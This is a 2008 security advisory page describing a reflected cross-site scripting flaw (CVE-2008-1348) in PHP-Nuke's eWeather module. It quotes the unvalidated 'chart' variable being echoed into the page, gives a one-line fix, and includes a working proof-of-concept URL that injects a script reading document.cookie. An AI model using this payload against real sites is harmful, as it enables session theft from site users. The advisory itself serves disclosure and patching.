Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : SecurityAlert

  Topic : XSS in PHP-Nuke (eWeather module)
  SecurityAlert : 3744
  CVE : CVE-2008-1348
  SecurityRisk : Low  alert  (About)
  Remote Exploit : Yes
  Local Exploit : No
  Exploit Given : Yes
  Credit : nima_501
  Published : 17.03.2008

  Affected Software : PHP-Nuke (eWeather module)



  Advisory Text :  

//////////XSS in PHP-Nuke (eWeather module)

PHP-Nuke (http://phpnuke.org):

PHP-Nuke is a news automated system specially designed to be used in

Intranets and Internet. The Administrator has total control of his web
site,

registered users, and he will have in the hand a powerful assembly of
tools

to maintain an active and 100% interactive web site using databases.

eWeather module (http://www.janitorialservice.us):

Weather module based on eWeather.biz data with 3 additional blocks

2 side and one center block.

///Details

From source-code of /modules/eWeather/index.php

Line 35: $zipCode=$chart;

Line 47: echo "<div align ="center"><h2>USA weather for zip code
$zipCode</h2>";

"chart" variable is unvalidated.

///Exploit

http://example.net/modules.php?name=eWeather&chart=[XSS]

http://example.net/modules.php?name=eWeather&chart=%3Cscript%3Ealert(doc
ument.cookie)%3C/script%3E

///Fix

Change line 35 to "$zipCode=(int)$chart;"

///Author:

NetJackal

http://netjackal.by.ru

http://hackerz.ir





  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

*BSD libc (strfmon) Multiple vulnerabilities

high- 2008-03-25

Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems.

Apache rss

» Apache Tomcat information
   disclosure

» Apache Tomcat <=
   6.0.18 UTF8 Directory
   Traversal Vulnerability

» Apache Tomcat information
   disclosure vulnerability

» Apache Tomcat XSS
   vulnerability

PHP rss

» PHP 5.2.6 (error_log)
   safe_mode bypass

» PHP 5.2.6 chdir(),ftok()
   (standard ext) safe_mode
   bypass

» PHP 5.2.6 posix_access()
   (posix ext) safe_mode
   bypass

» PHP 5.2.5 and prior :
   *printf() functions
   Integer Overflow

Copyright © SecurityReason. All Rights Reserved.